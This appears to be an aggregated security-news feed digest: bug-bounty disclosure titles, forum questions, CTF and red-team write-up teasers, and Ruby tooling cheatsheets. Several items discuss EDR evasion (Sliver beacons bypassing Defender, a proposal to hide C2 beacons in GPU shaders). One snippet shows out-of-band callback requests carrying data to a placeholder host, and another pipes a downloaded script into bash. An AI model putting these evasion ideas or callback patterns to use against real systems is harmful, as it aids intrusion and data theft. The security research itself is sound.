    Book Giveaway | China's first professional book on identity security, "Identity Attack Vectors"
    Starting from basic concept education and engineering practice guidance, the book gives a detailed introduction to enterprise IAM concepts and technologies as well as identity governance.
  • Open

    X and Pearl
    When X came out earlier this year, it was a competent, well-crafted tribute to ’70s slasher flicks from Ti West, but there was not much to… Continue reading on Medium »
  • Open

    My school is asking us to download and install a CA cert on personal devices to use the Wi-Fi
    Is this safe? Does this mean they will be able to see all of our activity? Any help would be appreciated! Edit: Here are the instructions they gave us: https://imgur.com/a/FkizKkS submitted by /u/coolmanic [link] [comments]
  • Open

    Break into the WiFi Network and Interact with Services
    submitted by /u/tbhaxor [link] [comments]
  • Open

    CVE-2022-34721 – Windows Internet Key Exchange (IKE) Protocol Extensions RCE
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34721 Comments URL: https://news.ycombinator.com/item?id=32848953 Points: 2 # Comments: 0
    Security advisories for Cargo (CVE-2022-36113, CVE-2022-36114)
    Article URL: https://blog.rust-lang.org/2022/09/14/cargo-cves.html Comments URL: https://news.ycombinator.com/item?id=32847567 Points: 4 # Comments: 0
  • Open

    Android NFC Race Condition Vulnerability Analysis (CVE-2021-0870)
    Author: Moyun@墨云科技VLab Team. Original link: https://mp.weixin.qq.com/s/ck5wwDi9hXmjtiPPfRgtXw Overview: NFC plays an important role in people's daily lives and has become an indispensable component of mobile devices. Like Bluetooth, NFC uses radio-frequency technology to communicate between devices. Consequently, both the chip firmware and the host NFC subsystem are targets for remote code execution (RCE) attacks. CVE-2021-0870 is a...
  • Open

    STORED XSS in /nlc/login.aspx via "edit" GET parameter through markdown editor [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by shreky: https://hackerone.com/reports/1631447
    time based SQL injection at [https://] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by malcolmx: https://hackerone.com/reports/1627970 - Bounty: $1000
    SQL injection at [] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by malcolmx: https://hackerone.com/reports/1626198 - Bounty: $1000
    SQL injection at [https://] [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by malcolmx: https://hackerone.com/reports/1627995 - Bounty: $1000
    SSRF in Functional Administrative Support Tool pdf generator () [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by codeprivate: https://hackerone.com/reports/1628209 - Bounty: $4000
    an internel important paths disclosure [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by ahmed0x0mahmoud: https://hackerone.com/reports/1631471
    Full read SSRF at [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by sudi: https://hackerone.com/reports/1628102 - Bounty: $500
    Unprotected and Test site API Exposes Documents, Credentials, and Emails in Proposal System
    U.S. Dept Of Defense disclosed a bug submitted by byteone: https://hackerone.com/reports/745171
    SSRF ACCESS AWS METADATA -
    U.S. Dept Of Defense disclosed a bug submitted by 0xr3dhunt: https://hackerone.com/reports/1623685
    IDOR Lead To VIEW & DELETE & Create api_key [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by bate5a: https://hackerone.com/reports/1628012
    XSS DUE TO CVE-2022-38463 in https://
    U.S. Dept Of Defense disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1681208
    springboot actuator is leaking internals at
    U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1662474
    Directory Traversal at
    U.S. Dept Of Defense disclosed a bug submitted by 0x45: https://hackerone.com/reports/1641148
    Shop - Reflected XSS With Clickjacking Leads to Steal User's Cookie In Two Domain
    Meredith disclosed a bug submitted by error201: https://hackerone.com/reports/1221942
    Abuse cookie-modification, toast HTML and expired domain in CSP-form-action replacing login-page at www.dropbox.com/login to submit creds externally
    Dropbox disclosed a bug submitted by fransrosen: https://hackerone.com/reports/1590794 - Bounty: $6909
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309386
  • Open

    How I abused the file upload function to get a high severity vulnerability in Bug Bounty
    Hello everyone, one of the most interesting functions is file uploading, vulnerabilities in file uploads usually lead you to critical or… Continue reading on InfoSec Write-ups »
    Burp Suite Extensions to help you Pentest
    Introduction Continue reading on Medium »
    A story of Host Header injection
    Hii all, I am back with a new hacking story . A few days ago, I was hunting on one of the VPD program Where i find a host-head injection… Continue reading on Medium »
  • Open

    Codecepticon - An offensive security obfuscator for C#, VBA, and PowerShell
    submitted by /u/h0wlett [link] [comments]
    135 is the new 445: PsExec over Remote Procedure Calls
    submitted by /u/0xdea [link] [comments]
    Caching the Un-cacheables - Abusing URL Parser Confusions (Web Cache Poisoning Technique)
    submitted by /u/albinowax [link] [comments]
    Bypassing IP based brute force protection with IPv6 temporary addresses
    submitted by /u/nopslider [link] [comments]
    Attacking the Android kernel using the Qualcomm TrustZone
    submitted by /u/jeandrew [link] [comments]
    How Cymulate Discovered an Abuse Risk in Google Cloud Platform (GCP)
    submitted by /u/cutboxhe [link] [comments]
  • Open

    Gambling Spam in Visual Composer Raw HTML Element: [vc_raw_html]
    Bad actors often look for clever ways to boost the rankings and visibility of their spam pages in search. One of the many black hat SEO injections that we regularly find on compromised sites involves spammy links hidden inside a with the following style “overflow:hidden;height:1px” that makes them invisible to a regular site visitor. Our SiteCheck scanner detects these SEO link injections as “spam-seo.hidden_content?68.5”. Continue reading Gambling Spam in Visual Composer Raw HTML Element: [vc_raw_html] at Sucuri Blog.
  • Open

    Showcasing Sliver C2, Bypassing Win Defender and Establishing Persistence
    To be honest, Sliver is the big deal. It's a brand new C2 framework (still in development) and really has a lot of potential. We showcased how to work with it and perform various TTPs, like persistence with exe hijacking or registry tweaking. The very default beacon was able to bypass Windows 10 Defender. I learned a lot (and was learning in real time while streaming, so I put timestamps for you to navigate it more easily) and hope you will learn something new from the video too. It is available on my YouTube: https://youtu.be/QO_1UMaiWHk submitted by /u/lsecqt [link] [comments]
    Decrypt WEP Traffic using Bruteforce with Insufficient IVs
    submitted by /u/tbhaxor [link] [comments]
    Hydra
    So I'm trying to use hydra to brute force a password check. It's for a class on VMs. How can I pull just logins from Active Directory? I've been able to pull users, but it's their legal names and not their logins. Then in Hydra, how do I know what protocol to use? submitted by /u/w_sohl [link] [comments]
  • Open

    Movies, some TV shows
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    SecWiki News 2022-09-14 Review
    No news updated today. For more of the latest articles, visit SecWiki.
  • Open

    White-Box and Black-Box Fuzzing for GraphQL APIs
    Article URL: https://arxiv.org/abs/2209.05833 Comments URL: https://news.ycombinator.com/item?id=32838301 Points: 1 # Comments: 0
  • Open

    Cloudflare Domain Verification
    Hi, I think I may be missing something very straightforward but it's not connecting in my head just yet. How does Cloudflare verify that you own the domain zone when you sign up and "Add a site"? I added a domain and just had to set my DNS nameservers to "jake.ns.cloudflare.com" and "marlowe.ns.cloudflare.com". These nameservers aren't unique to my domain zone right? So what if I was trying to hijack the Cloudflare config for another site and they already had these nameservers set up? Does Cloudflare check to see if there are existing CF nameservers and then ask the user to change them to a different pair? Hope my question makes sense. Appreciate any insight from this community. submitted by /u/createdforrequest [link] [comments]
  • Open

    Red Team Threat Intel TryHackMe
    https://tryhackme.com/room/redteamthreatintel Continue reading on Medium »
    Cyber Kill Chain TryHackMe
    Reconnaissance Continue reading on Medium »
    What to Consider Before Starting a Security Red Team Engagement?
    Cyber security red-teaming is a rather new paradigm. A few years ago when we started providing red-team as a service, all references for… Continue reading on Medium »
    Brute force domain cached credentials
    Have I always been able to brute force domain cached credentials just by disabling the network or is my AD lab messed up? I’m sure this… Continue reading on Medium »
  • Open

    FreeBuf Morning Report | Google and Meta fined 100 billion won; whistleblower accuses Twitter of "prioritizing profit over security"
    Google and Meta, suspected of collecting personal information in South Korea without user consent and using it for targeted online advertising, were fined 69.2 billion won and 30.8 billion won respectively.
    Major news: the Cybersecurity Law may be amended
    The amendment will further coordinate the law with related legislation, improve the legal liability regime, and protect the legitimate rights and interests of individuals and organizations in cyberspace.
    Big move! Google spends $5.4 billion to acquire cybersecurity company Mandiant
    Google announced the acquisition of cybersecurity company Mandiant for $5.4 billion; Mandiant will operate with the support of Google Cloud and keep its brand.
    ICS attack! Hacker group GhostSec claims to have breached 55 Berghof PLCs in Israel
    The attack is regarded as part of the "Free Palestine" movement.
  • Open

    [Security Bulletin] Microsoft's September 2022 Patch Tuesday fixes multiple high-risk vulnerabilities
    Microsoft recently released its September 2022 security patches, fixing 63 vulnerabilities across 38 Microsoft products, including 18 privilege escalation, 1 security feature bypass, 30 remote code execution, and 7 information disclosure...
  • Open

    CVE-2022-31625: PHP Vulnerability due to uninitialized array
    No content preview
    How to start Penetration testing of Artificial Intelligence
    Pentesting needs to evolve to find AI based risks Continue reading on InfoSec Write-ups »
    Attacking GPP (Group Policy Preferences) Credentials | Active Directory Pentesting
    No content preview
  • Open

    A Graph Convolutional Neural Network Approach to Identifying Web Login Entry Points
    Author: Alfy@墨云科技VLab Team. Original link: https://mp.weixin.qq.com/s/MtFZc1Zv6uNo25ORNijpaQ What is a web login entry point? Today most websites have authentication to prevent unauthorized access. Each account on a site has specific permissions; if an unauthorized user can log in to someone else's account by irregular means (such as weak-password brute forcing or stealing another user's username and password), it may lead to leakage of the site's user information, ...
    Binary Vulnerability Study Notes - PWN
    Author: b1cc@墨云科技VLab Team. Original link: https://mp.weixin.qq.com/s/1KoRr53tNryUKT4P1r7n6A This article is the author's organized notes from first learning pwn; corrections are welcome. Stack overflow vulnerabilities. Principle: The stack is a last-in, first-out data structure. Every function call is accompanied by the creation and restoration (also called balancing) of a stack frame. The stack layout is shown below (taking a 32-bit program as an example): As the figure shows, stack space grows from high addresses toward low...
    +1 and Onward, Escorting the Future | Slides for selected KCon 2022 Hacker Conference talks released
    From August 27 to 28, 2022, as high summer ended and early autumn arrived, KCon celebrated its eleventh birthday in a brand-new form. For its first ten years, KCon walked the path of exploring and sharing offensive and defensive network security technology and gained the support of many companions. In its eleventh year, KCon takes a new step, opening the next decade with the resolve and action of "+1". KCon 2022 was held entirely as a free online livestream for the first time, rebroadcast online simultaneously by four media outlets: 中国信息安全, 嘶吼, 数说安全, and 蘑菇云. Over two days, enthusiastic viewers...
  • Open

    In what way can you step your leg into this industry?
    I’ve been scrolling through LinkedIn, Handshake, Indeed, etc. job sites, and all of these positions require some level of DF experience from a job. Even internships are harder to land. I applied to a Special Investigations posting that analyzes malware, but outside of that I think it’s harder if you don’t have law enforcement or military experience. I would not be surprised if people with Cyber Security degrees are stumping out those with Computer Forensic degrees because, as opposed to Cyber Sec, this industry has no entry level jobs. It’s all on a whim. submitted by /u/Beercanadawhiskey [link] [comments]
    GETTING ENTRY LEVEL JOB WITHOUT DEGREE
    Hello, I am a high school senior debating whether or not to go to college. Here is my reasoning. My goal job is blockchain/cybercrime investigator with a blockchain company, or maybe even starting my own company. Now, I did some research on the people who have these crime investigator jobs, and most of them went to college for unrelated studies, with some not even going to college at all; most had a career background in cyber law enforcement jobs. So now my question: can I get some reputable certificates on my resume, get an entry level digital forensics job, even with a lower salary, then after 4 years advance to a cybercrime investigator position with a 140k+ salary? Because why use 4 of the best years of your life and spend an absurd amount of money to get a degree you probably won't even use, when you can work those 4 years at a job you enjoy and earn some money to invest by the time you're in your early 20s. For reference, I will be graduating high school at 17 and will have about 8 months till I turn 18, so my plan would be getting as many reputable certifications as possible in that time, then looking for an entry level position as soon as I turn 18. Please let me know if you think this is possible and any good cert suggestions. submitted by /u/WannabeCyberSecurity [link] [comments]
    email forensics searches
    hi all! new to ediscovery and have been asked to collect emails between two individuals. the time frame is going back two months and am looking for anything related to "tender requests" what would be the best way to set up search queries to narrow down the field of emails? ex: any sender from [sender1@yahoo.com](mailto:sender1@yahoo.com) to any receiver [sender2@gmail.com](mailto:sender2@gmail.com)? is it better to do keyword search on entire message vs subject only? any suggestions welcomed pls submitted by /u/justlikebadmedicine [link] [comments]

  • Open

    Any known case studies on a beacon’s logic executing from within a GPU compute shader?
    I’ve been tinkering with writing a chess engine as this fun security engineering project write-up where the vulnerable chess web app uses peer-to-peer and the attacker exploits the victim peer, the pieces start breaking the rules, we use memory forensics to try to analyze and detect the exploitation heuristically via dynamic run-time analysis with baselining… Anyway, I digress. As part of this project I’m thinking a lot about chess engines and wonder: Hmm, I could probably write a chess sim inside a GPU compute shader to calculate a large number of variations in parallel. Then it struck me: If I can do that, couldn’t we write beacons which mostly execute their malicious code within a GPU shader, then pass the I/O in and out of a more benign process? You’d still need to do some stuff on the CPU (any effects on target), but with popular C2 frameworks you have this significant, sort of robust beacon agent code injected in a process to be detected. Sleep masking hides it from memory scanning kinda sorta, but not really against good defensive techniques. Seems like you could hide most of that memory signature inside a GPU compute shader and have much less “robust” code (essentially attack surface for defenders to use for detection) in RAM. Doubt any EDRs out there are scanning VRAM… Even if you did zero processing in a shader, even just hiding data in VRAM when not in-use (example: sleep masking) seems interesting on its own. Maybe someone’s heard of such a thing? Google is terrible with results when “GPU” and “red team” point to non-cyber branding slang. Google Scholar also turned up nothing. submitted by /u/Jonathan-Todd [link] [comments]
  • Open

    Red Team Part 5 — Intro to C2 | TryHackMe
    Hello world and welcome to HaXeZ where today we’re going to be getting a bit more technical and looking at C2s. To clarify, C2 is short… Continue reading on Medium »
    Red Team Part 3 — Red Team Threat Intel | TryHackMe
    Hello world and welcome to HaXeZ, in this post we’re going to be walking through the 3rd Red Team challenge in the Red Team Fundamentals… Continue reading on Medium »
    Red Team Recon
    In a red team operation, you might start with no more than a company name, from which you need to start gathering information about the… Continue reading on Medium »
  • Open

    Try Hack Me — OhSINT CTF
    Try Hack Me hosts a small number of OSINT CTF’s. I completed the geolocation one some time ago, so thought i’d come back and take a look… Continue reading on Medium »
    Intel101 OSINT CTF Writeup
    Here’s my writeup of the Intel101 OSINT CTF by Champlain College on CyberDefenders, including solutions (spoiler alert!). The challenges… Continue reading on Medium »
    YUCTF Job Interview Write up
    Challenge name: Job Interview Continue reading on Medium »
  • Open

    CSRF in Changing User Verification Email
    TikTok disclosed a bug submitted by f_m: https://hackerone.com/reports/1531235 - Bounty: $500
    Web Cache Poisoning leads to XSS and DoS
    Glassdoor disclosed a bug submitted by nokline: https://hackerone.com/reports/1621540 - Bounty: $1700
    XSS in http://www.glassdoor.com/Search/results.htm via Parameter Pollution
    Glassdoor disclosed a bug submitted by nokline: https://hackerone.com/reports/1632119 - Bounty: $500
    DOS validator nodes of blockchain to block external connections
    Hyperledger disclosed a bug submitted by cre8: https://hackerone.com/reports/1695472 - Bounty: $1500
    No Restriction on password
    GitLab disclosed a bug submitted by patronum-m: https://hackerone.com/reports/1696814
    ReDoS in net/http affects webhooks: Sidekiq job stuck at 100% CPU for a year
    GitLab disclosed a bug submitted by afewgoats: https://hackerone.com/reports/1531958 - Bounty: $1160
    RCE via the DecompressedArchiveSizeValidator and Project BulkImports (behind feature flag)
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1609965 - Bounty: $33510
  • Open

    Mac Imaging Question
    Hello, do any of the veterans have a suggestion of how to take a logical image of a Mac machine remotely? I am considering the dd command to take the image and storing it to an external drive. Are there any more recommended or "forensically sound" ways to do this? I can not use Digital Collector in this situation since it's off-site. Thank you for any advice! submitted by /u/Fun_House2633 [link] [comments]
    I Want to learn how to start a investigation project through Autopsy
    Not relatively new to this field, but I want to start my first project that I can put on my resume. I'm kind of lost on which tools to use as well, outside of FTK Imager, IrfanView and Autopsy. submitted by /u/OhmyMary [link] [comments]
    Choice of Online Masters Degrees for Digital Forensics?
    Hello, I'm graduating soon with a BS in Cybersecurity and just started my first security analyst job. However, I'm interested in studying digital forensics and pivoting into that area. I'm wondering what the good choices are for 100% online masters degree programs for Digital Forensics. Based on my own research so far I've read good things about Champlain College and SANS. There is also University of the Cumberlands and University of Central Florida but not sure how all these choices compare in terms of preparing students for career readiness and school reputation. Also, recommendations for other schools are great too. Any insight on this would be greatly appreciated. Thank you. submitted by /u/Nurith [link] [comments]
    Tableau Forensic SATA/IDE bridge T35u problem
    Hello everyone, Just got this kit to try out and recover some data from an old 160GB (PATA) HDD drive. I connected everything as it should be and the firmware of the Tableau is up to date. When I connect to my laptop through USB and power the T35u, my laptop doesn't get recognized as a host and it also does not find the drive. The drive is not broken since I can hear it running. Also, I was able to find the device on my PC in update mode, so no cables are broken. My laptop is an MSI GF65 with Windows 11 as OS. Can anyone please help me? https://preview.redd.it/m1rc0raqwmn91.png?width=923&format=png&auto=webp&s=e0b6b7b59913fdc685b8eb04d351290b82078129 submitted by /u/Charles_IT_Drive [link] [comments]
    Remote Disk Imaging Solutions
    My org is moving towards allowing WFH to be permanent. With that, are there any good solutions for remote disk imaging via the internet as the vpn may not be on? submitted by /u/devilish_kevin_bacon [link] [comments]
    Getting started with Velociraptor IR - so many features for endpoint monitoring and DFIR
    submitted by /u/DFIRScience [link] [comments]
    Resources for disk image formats?
    Does anybody have some good resources (internet, books etc.) for finding some common disk image formats like ISO, VDI and VMDK to see how they differ and which one would be the easiest for analyzing? I have to build a tool that analyzes one of those formats without downloading the whole image and I can't quite find any good resources. So any help is appreciated! submitted by /u/abdell_071 [link] [comments]
  • Open

    Hacking Unity Games with Malicious GameObjects, Part 2
    submitted by /u/haxboxone [link] [comments]
    Introducing CloudFox: Automating situational awareness for cloud penetration tests
    submitted by /u/sethsec [link] [comments]
  • Open

    SecWiki News 2022-09-13 Review
    KCon 2022 Slide by ourren; Lessons from building network security at a technology platform enterprise by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Adding Hints to OAST
    Testing via OAST (OOB) has advanced a great deal in the last few years. Starting with Burp Suite's Collaborator, followed by Project Discovery's interactsh and ZAP's OAST, many tools have appeared, and as testing methods built on them were researched, OAST itself has emerged as a good way to identify many kinds of vulnerabilities. So today I want to talk about efforts to get more information out of OAST-based testing, and about the directions each tool will need to consider going forward. If you want to know more about OAST, please refer to the Cullinan > OAST document! Drop a hint: You cannot know when or how an OOB interaction caused by OAST will occur. So, with a small trick, you can add information so that hints can be obtained from the OOB request. HTTP: Since an HTTP request has many places that can carry data, you can have data requested via the URL query, the POST body, headers, and so on. Except for RCE-type cases, the body and headers are hard to control, so the URL query is usually used.
        GET /callback?data=.... HTTP/1.1
        Host: oast.service
    DNS: A DNS query caused by OAST has far too few fields to carry information. In that case, subdomains can be used to convey information.
        DNS_A custom_info.oast.service
        ;; opcode: QUERY, status: NOERROR, id: 34903
        ;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
    Including resource information in the DNS lookup when doing OAST became widely known from the Log4Shell issue at the end of last year. At that time, to quickly identify vulnerable targets...
  • Open

    Suppose an SSH relay / jumphost gets fully compromised. What could an attacker accomplish?
    Conventionally SSH relays were being used using agent forwarding, but I've come to understand that a more secure way is to use a jumphost with the ProxyCommand, as described in this article for example. So in this setup, suppose the attacker gained full root privileges on the relay / jumphost. What kind of damage is the attacker able to do? Are the clients or end-servers under any risk? submitted by /u/forevernooob [link] [comments]
    Why is it called Ingress / Egress instead of Inbound and Outbound
    Hi AskNetSec, I remember when I first started out, Inbound and Outbound Rules were used as the terminology for firewalls and networks. These days it seems to be Ingress and Egress; why did we swap? submitted by /u/CyberStagist [link] [comments]
  • Open

    Exploiting OAuth authentication vulnerabilities Part III
    No content preview
  • Open

    How Your Team’s Culture Determines the Value of Your Tabletop Exercise
    A tabletop exercise (TTX) measures more than an organization’s technical capabilities and adherence to an incident response plan—it facilitates the confluence of personalities and team cultures, in turn revealing friction not only in processes but also in team dynamics. The success of an organization’s response in both a TTX scenario and, more importantly, a real-world... The post How Your Team’s Culture Determines the Value of Your Tabletop Exercise appeared first on TrustedSec.
  • Open

    OriginLogger: A Look at Agent Tesla’s Successor
    We provide an overview of the OriginLogger keylogger, including info on a dropper lure and OriginLogger’s configuration and infrastructure. The post OriginLogger: A Look at Agent Tesla’s Successor appeared first on Unit 42.
  • Open

    Exploiting OAuth authentication vulnerabilities Part III
    OAuth Exploitation Continue reading on InfoSec Write-ups »
    How to create a port scanner with bash script in one minute
    Hello everyone, today I will show you how to create a Port Scanner in a minute on your Linux or any system with netcat installed. Continue reading on Medium »
  • Open

    Mirai malware variant MooBot targets D-Link devices
    Authors: Chao Lei, Zhibin Zhang, Cecilia Hu, Aveek Das Translators: Knownsec 404 Lab translation team Original link: https://unit42.paloaltonetworks.com/moobot-d-link-devices/ Executive summary In early August, Unit 42 researchers observed attacks exploiting multiple vulnerabilities in devices made by D-Link (a company specialising in networking and connectivity products). The exploited...
    Finding and exploiting Linux kernel-mode vulnerabilities in CTFs
    Author: lawhackzz@墨云科技 VLab Team Original link: https://mp.weixin.qq.com/s/VsGVvi_Vog1aKi0Cj9haGg This article focuses on analysing and exploiting kernel stack overflow and heap out-of-bounds access vulnerabilities. qwb2018 core Challenge link: https://pan.baidu.com/s/10te2a1LTZCiNi19_MzGmJg Password: ldiy Extract the official tar...
    KCon 2022 talk: automated API vulnerability discovery
    Authors: Zhou Yang (周阳), Lü Jie (吕竭)@星阑科技 PortalLab Original link: https://mp.weixin.qq.com/s/MCtwiT93Fo9Js9ekuD-8wA About the speakers Zhou Yang is a security R&D engineer at 星阑科技. He has extensive experience in vulnerability research and red-team weaponisation, has worked on building products including host vulnerability scanning, application vulnerability scanning, open-source software supply-chain security tracking and a vulnerability intelligence management platform, and has taken part in discovering several Linux system security vulnerabilities, receiving acknowledgements from the Ministry of Industry and Information Technology and other ministries. Currently...
  • Open

    macOS leaves users vulnerable, and unaware of their vulnerability
    Article URL: https://eclecticlight.co/2022/09/13/how-macos-leaves-users-vulnerable-and-unaware-of-their-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=32821699 Points: 35 # Comments: 11
  • Open

    Analysis and reproduction of the VMware Tools local privilege escalation vulnerability CVE-2022-31676 (1)
    Analysis and reproduction of the VMware Tools local privilege escalation vulnerability CVE-2022-31676 (1)
    FreeBuf morning report | Google acquires Mandiant for $5.4 billion; hackers attempted to break into the South Korean government 560,000 times
    Google's proposed $5.4 billion acquisition of cybersecurity company Mandiant has now been completed
    Cisco confirms the Yanluowang ransomware gang leaked company data
    Cisco has confirmed that the data leaked by the Yanluowang ransomware gang was stolen from the company's network by hackers during a cyberattack in May.
    Big news! Ukraine: cyberattacks have taken down 2,400 Russian websites
    Ukraine's IT Army attacked more than 2,400 Russian websites, including the largest bank in the Russian Federation, in the two weeks from 29 August to 11 September.
    Compliance analysis of cross-border flows of healthcare data
    Healthcare data concerns not only patients' safety and personal information rights, but also public interest and national security.
    Hackers use fake pop-up login windows to steal Steam accounts
    This is an increasingly popular attack technique that creates a fake login page inside the active window, usually as a pop-up of the service the user is trying to log into.

  • Open

    monerod JSON RPC server remote DoS
    Monero disclosed a bug submitted by m31007: https://hackerone.com/reports/1511843
    Response Manipulation leads to Admin Panel Login Bypass at https://admin.indevice.sonymobile.com/
    Sony disclosed a bug submitted by 0x2374: https://hackerone.com/reports/1508661
    Signup with any Email and Enable 2-FA without verifying Email
    Cloudflare Public Bug Bounty disclosed a bug submitted by imtheking: https://hackerone.com/reports/1543259 - Bounty: $350
  • Open

    Ideas for learning projects?
    I have a degree and a help desk background. I have a lot of experience with Linux and virtualization from hobby projects. I want to start on a new project that will help me build strong foundational skills to prepare for the CCE exam and for moving my career into DFIR. My question is 2-fold: What might be a good project? And what skills should I look to prioritize / develop? submitted by /u/Of_Jotunheimr [link] [comments]
    view cluster option greyed out in encase
    I'm trying to view this evidence file and the view cluster option in the disk view is greyed out. What do you think is the cause? submitted by /u/shalnark90 [link] [comments]
    Getting a start in the Digital Forensics field
    So I'm about to finish school in the Digital Forensics field and I'm trying to look for a start in the field already, but having trouble doing so. The only experience I really have is what I've learned in school. I'm coming from mainly a retail work experience history. Is there any advice that anyone can provide that may lead me in the right direction? I'd greatly appreciate any help anyone can provide. submitted by /u/DeviantWolfe [link] [comments]
  • Open

    GitHub - thiagopeixoto/massayo: Massayo is a small proof-of-concept Rust library which removes AV/EDR hooks in a given system DLL by loading a fresh copy from disk and replacing the .text section of the currently loaded DLL
    submitted by /u/thewatcher_ [link] [comments]
    The seventh way to call a JavaScript function without parentheses
    submitted by /u/0xdea [link] [comments]
    How a Script Kiddie and 25 Lines of Python Could Theoretically Devastate America’s Gas Stations
    submitted by /u/entropydaemon9 [link] [comments]
    Redeye is a platform to cover all aspects of red team engagement (data management, red team operation management, etc.)
    submitted by /u/Idov31 [link] [comments]
    Let’s Encrypt is turning on new infrastructure to support revoking certificates via Certificate Revocation Lists
    submitted by /u/c0r0n3r [link] [comments]
    Data-Centric Security: Threat Hunting based on Zipf’s Law
    submitted by /u/ditrizna [link] [comments]
    The Anatomy of a Malicious Package
    submitted by /u/ambray_ [link] [comments]
  • Open

    Intro to C2
    Learn the essentials of Command and Control to help you become a better Red Teamer and simplify your next Red Team assessment! Continue reading on Medium »
    Red Team Part 4 — Red Team OPSEC | TryHackMe
    Hello world and welcome to HaXeZ, where today we’re continuing the Red Team path on TryHackMe and looking at OPSEC. In essence, TryHackMe… Continue reading on Medium »
    GitHub: The Red-Teamer’s Cheat-Sheet
    This blog curated by experts at Komodo Consulting helps you understand about GitHub red-teamer’s cheat sheet. GitHub has become one of the… Continue reading on Medium »
  • Open

    Microsoft investigates Iranian attacks against the Albanian government
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    $100k Bug Bounty for QuickSwap’s V3 Beta: Dragons Eat Bugs
    QuickSwap is offering up to $100,000 to users who detect and privately report any vulnerabilities pertaining to our V3 smart contracts. Continue reading on Medium »
    Essential RECON Tools
    In this article, I’ll discuss my favorite recon tools which I often use in Bug Bounty. And a few years ago, I posted a Twitter post by… Continue reading on Medium »
    Privacy Violation In Chat System (Report Writeup)
    Report from Private Program on Hackerone Continue reading on Medium »
    Broken Access Control
    Hey folks, hope you all are doing well! In OWASP Top 10 2021, the Broken Access Control (BAC) grabbed the first position with the most… Continue reading on Medium »
    How I DIDN’T get an RCE in a $200 Billion company — Bug Bounty
    I was hunting for CVE-2021-36356 on my subdomain list of over 1,000,000+ subdomains, and finally got a hit… Continue reading on Medium »
    Detecting Log4j & its Remediation
    This article is dedicated to log4j and how it’s being exploited in the wild by attackers. Continue reading on InfoSec Write-ups »
    What are Bug Bounties? And why are they important?
    Introduction Continue reading on Medium »
  • Open

    Meraki firewall configuration analysis
    I've been tasked with performing a secure configuration review for Meraki firewalls. I wanted to see if anyone had any suggestions such as tools or manual guides to perform such a review. Normally, I'd use Nipper to perform such an audit, but these devices aren't supported. Does anyone have experience in this? It would be greatly appreciated if anyone had any information. submitted by /u/ruarchproton [link] [comments]
  • Open

    SecWiki News 2022-09-12 Review
    [HTB] Bart Writeup by 0x584a SecWiki Weekly (Issue 445) by ourren For more of the latest articles, visit SecWiki
  • Open

    Ruby Cheatsheet
    🔍 Introduction Ruby is a language with an elegant syntax that reads naturally and is easy to write. Because its philosophy is human-centred design, it is highly readable and the language itself was designed to be easy to use. It is also open source and a pure object-oriented programming language, so every data type, including integers and strings, is an object. VHLL (Very High-Level Language) Pure OOP (Object-Oriented Programming) Multiple Platforms But in fact we need to focus on humans, on how humans care about doing programming or operating the application of the machines. Matz # Greeter class class Greeter def initialize(name) @name = name.capitalize end def salute puts "Hello #{@name}!" end end # create a new object g = Greeter.new("world") # prints "Hello World!" g.salute 📜 Style Guide https://rubystyle.guide/ 😎 Awesome Resources Awesome Ruby Ruby Patterns 🎛 RVM On macOS, Ruby is installed on the system by default. However, on other OSes, or when a specific Ruby version is needed, it is better to use a version manager such as rvm or rbenv than to install directly into the system. # Install RVM curl -sSL https://get.rvm.io | bash -s stable # Install/Use Ruby 3.0 rvm install 3.0.0 rvm use 3.0.0 💎 Gem Gem is Ruby's package manager. With the gem command you can install, remove and search for Ruby-based tools and libraries. # install gem install yaml # remove gem uninstall yaml # search...
    Rake (Ruby Make)
    Rake is a build utility used in Ruby, similar to Make. The name rake is itself a word made from ruby + make, and it is used as a development tool in many environments, from ordinary Ruby applications to Rails. A make-like build utility for Ruby. Today I want to talk about Rake, which handles everything from simple build tasks to a range of development features. Installation gem install rake Make/Run Task Rake is managed through a Rakefile. Tasks are declared in that file, and a task is written as Ruby code. task :env do puts ENV['PHASE'] end After creating the Rakefile, you can run it or list its tasks with the rake command. Frequently used flags are below. # Rakefile rake -f # runs against the specified rakefile. # Show rake -T # prints the runnable tasks. rake -AT # prints all tasks. # Run rake # runs the default rake task. rake # runs the specified task. # -j, --jobs sets the maximum number of tasks to run concurrently when processing in parallel. # -m, --multitask processes all tasks in parallel. Tricks Run rb file Even without defining code directly inside the rakefile, you can specify a file for ruby to run. task :run do ruby 'tasks/run.rb' end Default task With task default: you can specify the default rake task. task default: %w[test] task :test do ruby "test/unittest.rb" end Namespace Namespace is a feature for grouping and managing several tasks. With namespace...
  • Open

    NPM supply-chain security best-practices guide
    This article presents supply-chain security best practices for using the NPM package manager, compiled and published by the OpenSSF Best Practices for Open Source Developers working group.
    FreeBuf morning report | Samsung faces class action over data breach; over 3,000 USTC students and staff hit by phishing emails
    Samsung allowed an unauthorised third party to access and steal customer information from the company's US systems, including names, dates of birth, contact information and product registration information.
    Understanding the Tomcat Valve-type memory shell and hand-writing an EXP
    Valve-type memory shells are implemented on the basis of Servlet memory shells, but differ slightly in their form.
  • Open

    Video Blog: Using DLL Persist to Avoid Detection
    During an Incident Response case, the TrustedSec IR team came across a novel method used by an attacker to maintain access to the target’s servers. After gaining access to the systems, the attacker then modified a DLL required by a service to include malicious code. This video demonstrates a similar process for embedding malicious code... The post Video Blog: Using DLL Persist to Avoid Detection appeared first on TrustedSec.
  • Open

    Thick Client Pentest, Out-of-band XXE, Bug Hunting Resources, RDP, LogonTypes, PowerShell…
    No content preview
    Detecting Log4j & its Remediation
